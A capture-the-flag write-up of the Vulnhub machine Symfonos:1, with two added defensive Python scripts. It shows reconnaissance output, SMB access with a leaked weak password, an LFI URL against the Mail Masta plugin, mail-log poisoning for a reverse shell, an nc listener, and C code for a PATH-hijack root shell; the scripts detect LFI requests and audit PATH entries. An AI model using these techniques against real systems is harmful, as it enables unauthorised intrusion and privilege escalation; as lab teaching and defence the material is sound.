__    _____        _____     _____ _ _____
        |  |  |  _  |   ___|  _  |___|  |  |_|_   _|___
        |  |__|     |  |  _|     |_ -|     | | | | | .'| 
        |_____|__|__|  |___|__|__|___|__|__|_| |_| |__,|
			hello@lacashita.com

 
 [Vulnhub] Symfonos:1 [1]

NMAP
-----

--[sml@cassandra][~/vulnhub/symfonos]
$nmap -p- -A 192.168.20.154
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-07 19:23 CEST
Nmap scan report for 192.168.20.154
Host is up (0.0012s latency).
Not shown: 65530 closed ports
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 ab:5b:45:a7:05:47:a5:04:45:ca:6f:18:bd:18:03:c2 (RSA)
|   256 a0:5f:40:0a:0a:1f:68:35:3e:f4:54:07:61:9f:c6:4a (ECDSA)
|_  256 bc:31:f5:40:bc:08:58:4b:fb:66:17:ff:84:12:ac:1d (ED25519)
25/tcp  open  smtp        Postfix smtpd
|_smtp-commands: symfonos.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, 
| ssl-cert: Subject: commonName=symfonos
| Subject Alternative Name: DNS:symfonos
| Not valid before: 2019-06-29T00:29:42
|_Not valid after:  2029-06-26T00:29:42
|_ssl-date: TLS randomness does not represent time
80/tcp  open  http        Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Site doesn't have a title (text/html).
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.5.16-Debian (workgroup: WORKGROUP)
Service Info: Hosts:  symfonos.localdomain, SYMFONOS; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1h40m08s, deviation: 2h53m12s, median: 8s
|_nbstat: NetBIOS name: SYMFONOS, NetBIOS user: , NetBIOS MAC:  (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.5.16-Debian)
|   Computer name: symfonos
|   NetBIOS computer name: SYMFONOS\x00
|   Domain name: \x00
|   FQDN: symfonos
|_  System time: 2019-07-07T12:23:48-05:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2019-07-07 19:23:48
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.64 seconds



GOBUSTER
--------

--[sml@cassandra][~]
$gobuster -w /usr/share/wordlists/dirb/big.txt -u 192.168.20.154

=====================================================
Gobuster v2.0.1              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://192.168.20.154/
[+] Threads      : 10
[+] Wordlist     : /usr/share/wordlists/dirb/big.txt
[+] Status codes : 200,204,301,302,307,403
[+] Timeout      : 10s
=====================================================
2019/07/07 19:25:47 Starting gobuster
=====================================================
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/manual (Status: 301)
/server-status (Status: 403)
=====================================================
2019/07/07 19:25:50 Finished
=====================================================



ENUM4LINUX
-----------

--[..][sml@cassandra][~]
$enum4linux -a 192.168.20.154
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Jul  7 19:43:34 2019

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 192.168.20.154
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ====================================================== 
|    Enumerating Workgroup/Domain on 192.168.20.154    |
 ====================================================== 
[+] Got domain/workgroup name: WORKGROUP

 ============================================== 
|    Nbtstat Information for 192.168.20.154    |
 ============================================== 
Looking up status of 192.168.20.154
	SYMFONOS        <00> -         B   Workstation Service
	SYMFONOS        <03> -         B   Messenger Service
	SYMFONOS        <20> -         B   File Server Service
	..__MSBROWSE__. <01> -  B   Master Browser
	WORKGROUP       <00> -  B   Domain/Workgroup Name
	WORKGROUP       <1d> -         B   Master Browser
	WORKGROUP       <1e> -  B   Browser Service Elections

	MAC Address = 00-00-00-00-00-00

 ======================================= 
|    Session Check on 192.168.20.154    |
 ======================================= 
[+] Server 192.168.20.154 allows sessions using username '', password ''

 ============================================= 
|    Getting domain SID for 192.168.20.154    |
 ============================================= 
Unable to initialize messaging context
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup

 ======================================== 
|    OS information on 192.168.20.154    |
 ======================================== 
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 192.168.20.154 from smbclient: 
[+] Got OS info for 192.168.20.154 from srvinfo:
Unable to initialize messaging context
	SYMFONOS       Wk Sv PrQ Unx NT SNT Samba 4.5.16-Debian
	platform_id     :	500
	os version      :	6.1
	server type     :	0x809a03

 =============================== 
|    Users on 192.168.20.154    |
 =============================== 
index: 0x1 RID: 0x3e8 acb: 0x00000010 Account: helios	Name: 	Desc: 

user:[helios] rid:[0x3e8]

 =========================================== 
|    Share Enumeration on 192.168.20.154    |
 =========================================== 
Unable to initialize messaging context

	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	helios          Disk      Helios personal share
	anonymous       Disk      
	IPC$            IPC       IPC Service (Samba 4.5.16-Debian)
Reconnecting with SMB1 for workgroup listing.

	Server               Comment
	---------            -------

	Workgroup            Master
	---------            -------
	WORKGROUP            

[+] Attempting to map shares on 192.168.20.154
//192.168.20.154/print$	Mapping: DENIED, Listing: N/A
//192.168.20.154/helios	Mapping: DENIED, Listing: N/A
//192.168.20.154/anonymous	Mapping: OK, Listing: OK
//192.168.20.154/IPC$	[E] Can't understand response:
Unable to initialize messaging context
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*

 ====================================================== 
|    Password Policy Information for 192.168.20.154    |
 ====================================================== 


[+] Attaching to 192.168.20.154 using a NULL share

[+] Trying protocol 445/SMB...

[+] Found domain(s):

	[+] SYMFONOS
	[+] Builtin

[+] Password Info for Domain: SYMFONOS

	[+] Minimum password length: 5
	[+] Password history length: None
	[+] Maximum password age: 37 days 6 hours 21 minutes 
	[+] Password Complexity Flags: 000000

		[+] Domain Refuse Password Change: 0
		[+] Domain Password Store Cleartext: 0
		[+] Domain Password Lockout Admins: 0
		[+] Domain Password No Clear Change: 0
		[+] Domain Password No Anon Change: 0
		[+] Domain Password Complex: 0

	[+] Minimum password age: None
	[+] Reset Account Lockout Counter: 30 minutes 
	[+] Locked Account Duration: 30 minutes 
	[+] Account Lockout Threshold: None
	[+] Forced Log off Time: 37 days 6 hours 21 minutes 


[+] Retieved partial password policy with rpcclient:

Password Complexity: Disabled
Minimum Password Length: 5


 ================================ 
|    Groups on 192.168.20.154    |
 ================================ 

[+] Getting builtin groups:

[+] Getting builtin group memberships:

[+] Getting local groups:

[+] Getting local group memberships:

[+] Getting domain groups:

[+] Getting domain group memberships:

        

SMBCLIENT
---------

We connect as anonymous (blank password) and download the file.

--[sml@cassandra][~/vulnhub/symfonos]
$smbclient \\\\192.168.20.154\\anonymous
Unable to initialize messaging context
Enter WORKGROUP\sml's password: 
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Sat Jun 29 03:14:49 2019
  ..                                  D        0  Sat Jun 29 03:12:15 2019
  attention.txt                       N      154  Sat Jun 29 03:14:49 2019

		19994224 blocks of size 1024. 17303080 blocks available
		
smb: \> get attention.txt
getting file \attention.txt of size 154 as attention.txt (50,1 KiloBytes/sec) (average 50,1 KiloBytes/sec)
smb: \> exit

--[sml@cassandra][~/vulnhub/symfonos]
$cat attention.txt 

Can users please stop using passwords like 'epidioko', 'qwerty' and 'baseball'! 

Next person I find using one of these passwords will be fired!

-Zeus


We connect as the user "helios" seen in the enum4linux output.
The password is qwerty (one of the three listed in attention.txt).

--[..][sml@cassandra][~]
$smbclient \\\\192.168.20.154\\helios --user helios
Unable to initialize messaging context
Enter WORKGROUP\helios's password: 
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Sat Jun 29 02:32:05 2019
  ..                                  D        0  Sat Jun 29 02:37:04 2019
  research.txt                        A      432  Sat Jun 29 02:32:05 2019
  todo.txt                            A       52  Sat Jun 29 02:32:05 2019

		19994224 blocks of size 1024. 17302288 blocks available
smb: \> get research.txt
getting file \research.txt of size 432 as research.txt (210,9 KiloBytes/sec) (average 210,9 KiloBytes/sec)
smb: \> get todo.txt
getting file \todo.txt of size 52 as todo.txt (25,4 KiloBytes/sec) (average 118,2 KiloBytes/sec)


--[sml@cassandra][~]
$cat research.txt 
Helios (also Helius) was the god of the Sun in Greek mythology. He was thought to ride a golden chariot which brought the Sun across the skies each day from the east (Ethiopia) to the west (Hesperides) while at night he did the return journey in leisurely fashion lounging in a golden cup. The god was famously the subject of the Colossus of Rhodes, the giant bronze statue considered one of the Seven Wonders of the Ancient World.
--[sml@cassandra][~]
$cat todo.txt 

1. Binge watch Dexter
2. Dance
3. Work on /h3l105

WPSCAN
-------

--[sml@cassandra][~]
$wpscan --url http://symfonos.local/h3l105/
_______________________________________________________________
        __          _______   _____
        \ \        / /  __ \ / ____|
         \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team
                       Version 3.5.3
          Sponsored by Sucuri - https://sucuri.net
      @_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________

[+] URL: http://symfonos.local/h3l105/
[+] Started: Wed Jul 10 20:45:20 2019

Interesting Finding(s):

[+] http://symfonos.local/h3l105/
 | Interesting Entry: Server: Apache/2.4.25 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] http://symfonos.local/h3l105/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] http://symfonos.local/h3l105/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://symfonos.local/h3l105/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] http://symfonos.local/h3l105/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.2.2 identified (Latest, released on 2019-06-18).
 | Detected By: Rss Generator (Passive Detection)
 |  - http://symfonos.local/h3l105/index.php/feed/, https://wordpress.org/?v=5.2.2
 |  - http://symfonos.local/h3l105/index.php/comments/feed/, https://wordpress.org/?v=5.2.2

[+] WordPress theme in use: twentynineteen
 | Location: http://symfonos.local/h3l105/wp-content/themes/twentynineteen/
 | Latest Version: 1.4 (up to date)
 | Last Updated: 2019-05-07T00:00:00.000Z
 | Readme: http://symfonos.local/h3l105/wp-content/themes/twentynineteen/readme.txt
 | Style URL: http://symfonos.local/h3l105/wp-content/themes/twentynineteen/style.css?ver=1.4
 | Style Name: Twenty Nineteen
 | Style URI: https://wordpress.org/themes/twentynineteen/
 | Description: Our 2019 default theme is designed to show off the power of the block editor. It features custom sty...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Detected By: Css Style (Passive Detection)
 |
 | Version: 1.4 (80% confidence)
 | Detected By: Style (Passive Detection)
 |  - http://symfonos.local/h3l105/wp-content/themes/twentynineteen/style.css?ver=1.4, Match: 'Version: 1.4'

[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] mail-masta
 | Location: http://symfonos.local/h3l105/wp-content/plugins/mail-masta/
 | Latest Version: 1.0 (up to date)
 | Last Updated: 2014-09-19T07:52:00.000Z
 |
 | Detected By: Urls In Homepage (Passive Detection)
 |
 | [!] 2 vulnerabilities identified:
 |
 | [!] Title: Mail Masta 1.0 - Unauthenticated Local File Inclusion (LFI)
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8609
 |      - https://www.exploit-db.com/exploits/40290/
 |      - https://cxsecurity.com/issue/WLB-2016080220
 |
 | [!] Title: Mail Masta 1.0 - Multiple SQL Injection
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8740
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6095
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6096
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6097
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6098
 |      - https://github.com/hamkovic/Mail-Masta-Wordpress-Plugin
 |
 | Version: 1.0 (100% confidence)
 | Detected By: Readme - Stable Tag (Aggressive Detection)
 |  - http://symfonos.local/h3l105/wp-content/plugins/mail-masta/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://symfonos.local/h3l105/wp-content/plugins/mail-masta/readme.txt

[+] site-editor
 | Location: http://symfonos.local/h3l105/wp-content/plugins/site-editor/
 | Latest Version: 1.1.1 (up to date)
 | Last Updated: 2017-05-02T23:34:00.000Z
 |
 | Detected By: Urls In Homepage (Passive Detection)
 |
 | [!] 1 vulnerability identified:
 |
 | [!] Title: Site Editor <= 1.1.1 - Local File Inclusion (LFI)
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9044
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7422
 |      - http://seclists.org/fulldisclosure/2018/Mar/40
 |      - https://github.com/SiteEditor/editor/issues/2
 |
 | Version: 1.1.1 (80% confidence)
 | Detected By: Readme - Stable Tag (Aggressive Detection)
 |  - http://symfonos.local/h3l105/wp-content/plugins/site-editor/readme.txt

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:00 <=================================================================================================================> (21 / 21) 100.00% Time: 00:00:00

[i] No Config Backups Found.


[+] Finished: Wed Jul 10 20:45:25 2019
[+] Requests Done: 22
[+] Cached Requests: 36
[+] Data Sent: 4.495 KB
[+] Data Received: 3.474 KB
[+] Memory used: 189.371 MB
[+] Elapsed time: 00:00:04

We see that it is vulnerable to LFI [2], following the exploit-db instructions [3].

If we visit the following link:
http://192.168.131.130/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php/?pl=/var/mail/helios 

Through the LFI we can read helios's mailbox. Since the plugin includes that file rather than merely displaying it,
any PHP written into the mailbox runs when the page is requested, so we connect to SMTP
and send helios an email containing a reverse shell.
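The request above reads a file the web server can reach, which also makes it easy to spot in the access log. The following script is an added example (not part of the original write-up or of the Mail Masta plugin) that flags such requests; the log lines are constructed, and only the `pl` parameter name and plugin path are taken from the URL above.

```python
"""Flag local-file-inclusion attempts like the count_of_send.php request above
in Apache access logs. Added example for this write-up, not part of the
original post or of the Mail Masta plugin; the log lines are constructed.
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Common/combined log format: client, ident, user, [time], "METHOD target PROTO", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

# Parameter values that point at the filesystem instead of a plugin template.
SUSPICIOUS = (
    re.compile(r"\.\.[/\\]"),                                   # directory traversal
    re.compile(r"^/(etc|var|proc|home|root|tmp)(/|$)"),         # absolute system path
    re.compile(r"^(php|file|data|expect|zip|phar)://", re.I),   # PHP stream wrapper
)

def find_lfi(line):
    """Return (client ip, parameter, decoded value) for the first suspicious
    query parameter in one log line, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    query = urlsplit(m.group("target")).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        value = unquote(value)          # second decode catches %252e-style tricks
        if any(p.search(value) for p in SUSPICIOUS):
            return (m.group("ip"), name, value)
    return None

def scan(lines):
    """All hits across a log, in order."""
    return [hit for hit in map(find_lfi, lines) if hit]

# Constructed sample log (not taken from the VM); the client is the attacker box above.
SAMPLE_LOG = """\
192.168.131.128 - - [10/Jul/2019:20:45:20 +0200] "GET /h3l105/ HTTP/1.1" 200 5231 "-" "WPScan"
192.168.131.128 - - [10/Jul/2019:20:46:02 +0200] "GET /h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php/?pl=/var/mail/helios HTTP/1.1" 200 412 "-" "Mozilla/5.0"
192.168.131.128 - - [10/Jul/2019:20:46:10 +0200] "GET /h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=..%252F..%252F..%252Fetc%252Fpasswd HTTP/1.1" 200 1704 "-" "Mozilla/5.0"
192.168.131.128 - - [10/Jul/2019:20:46:30 +0200] "GET /h3l105/index.php/feed/ HTTP/1.1" 200 3110 "-" "Mozilla/5.0"
""".splitlines()

if __name__ == "__main__":
    for ip, param, value in scan(SAMPLE_LOG):
        print(f"{ip} LFI attempt: {param}={value}")
```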

SMTP
----

--[sml@cassandra][~]
$telnet 192.168.131.130 25
Trying 192.168.131.130...
Connected to 192.168.131.130.
Escape character is '^]'.
220 symfonos.localdomain ESMTP Postfix (Debian/GNU)
mail from: loco
250 2.1.0 Ok
rcpt to: helios
250 2.1.5 Ok
data
354 End data with <CR><LF>.<CR><LF>

--PASTE THE REVERSE-SHELL PHP HERE--
.
250 2.0.0 Ok: queued as 6824840762

LOW SHELL
----------

On the attacking machine we start an nc listener and wait for the connection.

--[sml@cassandra][~]
$nc -nlvp 1234
listening on [any] 1234 ...
connect to [192.168.131.128] from (UNKNOWN) [192.168.131.130] 37688
Linux symfonos 4.9.0-9-amd64 #1 SMP Debian 4.9.168-1+deb9u3 (2019-06-16) x86_64 GNU/Linux
 12:04:22 up 35 min,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=1000(helios) gid=1000(helios) groups=1000(helios),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1000(helios) gid=1000(helios) groups=1000(helios),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)

We look for setuid files.

$ find / -perm /4000 2>/dev/null
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/opt/statuscheck
/bin/mount
/bin/umount
/bin/su
/bin/ping

We see that statuscheck is not one of the "usual" ones. Let's explore it.

$ /opt/statuscheck
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0   328    0     0    0     0      HTTP/1.1 200 OK-- --:--:-- --:--:--     0
Date: Sun, 14 Jul 2019 14:23:31 GMT
Server: Apache/2.4.25 (Debian)

$ strings /opt/statuscheck
/lib64/ld-linux-x86-64.so.2
libc.so.6
system
__cxa_finalize
__libc_start_main
_ITM_deregisterTMCloneTable
__gmon_start__
_Jv_RegisterClasses
_ITM_registerTMCloneTable
GLIBC_2.2.5
curl -I H
http://lH
ocalhostH
AWAVA
AUATL

With strings we see that it runs the "curl" binary (called by name, without an absolute path).
We write and compile the following code in /tmp/a.c, which will give us a shell as root.
 
$ cat a.c
#include <unistd.h>

int main(void)
{
    /* statuscheck is setuid root, so this fake "curl" starts with euid 0;
       make the real uid/gid root as well before spawning the shell */
    setuid(0);
    setgid(0);
    execl("/bin/sh", "sh", (char *)NULL);
    return 0;
}
$ gcc -o curl a.c

Once compiled, we change the PATH so that our "curl" is executed first instead of
the "original" one.

$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
$ export PATH=/tmp:$PATH
$ /opt/statuscheck
id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),1000(helios)

cat proof.txt

	Congrats on rooting symfonos:1!

                 \ __
--==/////////////[})))==*
                 / \ '          ,|
                    `\`\      //|                             ,|
                      \ `\  //,/'                           -~ |
   )             _-~~~\  |/ / |'|                       _-~  / ,
  ((            /' )   | \ / /'/                    _-~   _/_-~|
 (((            ;  /`  ' )/ /''                 _ -~     _-~ ,/'
 ) ))           `~~\   `\\/'/|'           __--~~__--\ _-~  _/, 
((( ))            / ~~    \ /~      __--~~  --~~  __/~  _-~ /
 ((\~\           |    )   | '      /        __--~~  \-~~ _-~
    `\(\    __--(   _/    |'\     /     --~~   __--~' _-~ ~|
     (  ((~~   __-~        \~\   /     ___---~~  ~~\~~__--~ 
      ~~\~~~~~~   `\-~      \~\ /           __--~~~'~~/
                   ;\ __.-~  ~-/      ~~~~~__\__---~~ _..--._
                   ;;;;;;;;'  /      ---~~~/_.-----.-~  _.._ ~\     
                  ;;;;;;;'   /      ----~~/         `\,~    `\ \        
                  ;;;;'     (      ---~~/         `:::|       `\\.      
                  |'  _      `----~~~~'      /      `:|        ()))),      
            ______/\/~    |                 /        /         (((((())  
          /~;;.____/;;'  /          ___.---(   `;;;/             )))'`))
         / //  _;______;'------~~~~~    |;;/\    /                ((   ( 
        //  \ \                        /  |  \;;,\                 `   
       (<_    \ \                    /',/-----'  _> 
        \_|     \\_                 //~;~~~~~~~~~ 
                 \_|               (,~~   
                                    \~\
                                     ~~

	Contact me via Twitter @zayotic to give feedback!
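To make the statuscheck PATH hijack concrete from the defender's side, here is an added example (not code from the write-up or from the VM): it models how /bin/sh resolves the unqualified "curl" over the two PATH values shown above, audits a PATH for entries a setuid program must not trust, and shows how statuscheck should have launched curl. The set of executables is constructed; `hardened_status_check` is a hypothetical replacement, not the VM's binary.

```python
"""Why /opt/statuscheck could be hijacked, and how to audit a PATH for it.

Added example for this write-up, not code from the original post or the VM: it
models how /bin/sh (which system() invokes) looks up an unqualified "curl" in
PATH, using a constructed in-memory set of executables, not the real filesystem.
"""
import os
import stat
import subprocess

# Directories any local user can write to; a privileged program must never
# let them decide which "curl" it runs.
UNTRUSTED_PREFIXES = ("/tmp", "/var/tmp", "/dev/shm")

def resolve_command(cmd, path_env, executables):
    """Path the shell would run for `cmd` (searched left to right), or None.

    An empty PATH entry means the current directory; a name containing "/"
    is never searched. `executables` is the constructed set of binaries.
    """
    if "/" in cmd:
        return cmd if cmd in executables else None
    for entry in path_env.split(":"):
        candidate = os.path.join(entry or ".", cmd)
        if candidate in executables:
            return candidate
    return None

def audit_path(path_env, check_fs=True):
    """(entry, reason) pairs for PATH entries a setuid program must not trust.

    Flags empty/relative entries, well-known scratch directories and, when
    check_fs is set and the directory exists here, anything world-writable.
    """
    findings = []
    for entry in path_env.split(":"):
        if not entry.startswith("/"):
            findings.append((entry or "(empty)", "relative entry, resolves against cwd"))
        elif any(entry == p or entry.startswith(p + "/") for p in UNTRUSTED_PREFIXES):
            findings.append((entry, "world-writable scratch directory"))
        elif check_fs:
            try:
                if os.stat(entry).st_mode & stat.S_IWOTH:
                    findings.append((entry, "directory is world-writable"))
            except OSError:
                pass  # not present on this host; nothing to judge

    return findings

# PATH values from the write-up; the executable set is constructed, not a real listing.
ORIGINAL_PATH = "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
HIJACKED_PATH = "/tmp:" + ORIGINAL_PATH
EXECUTABLES = {"/usr/bin/curl", "/tmp/curl"}

def hardened_status_check():
    """How statuscheck should launch curl: absolute path, PATH it sets itself.
    Nothing here needs root, so a real setuid helper would also drop to the
    caller's uid (os.setresuid) first. Returns curl's exit status."""
    return subprocess.run(["/usr/bin/curl", "-I", "http://localhost"],
                          env={"PATH": "/usr/bin:/bin"}, check=False).returncode

if __name__ == "__main__":
    print(resolve_command("curl", ORIGINAL_PATH, EXECUTABLES))  # /usr/bin/curl
    print(resolve_command("curl", HIJACKED_PATH, EXECUTABLES))  # /tmp/curl
    print(audit_path(HIJACKED_PATH))
```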

[1] https://www.vulnhub.com/entry/symfonos-1,322/
[2] https://en.wikipedia.org/wiki/File_inclusion_vulnerability
[3] https://www.exploit-db.com/exploits/40290/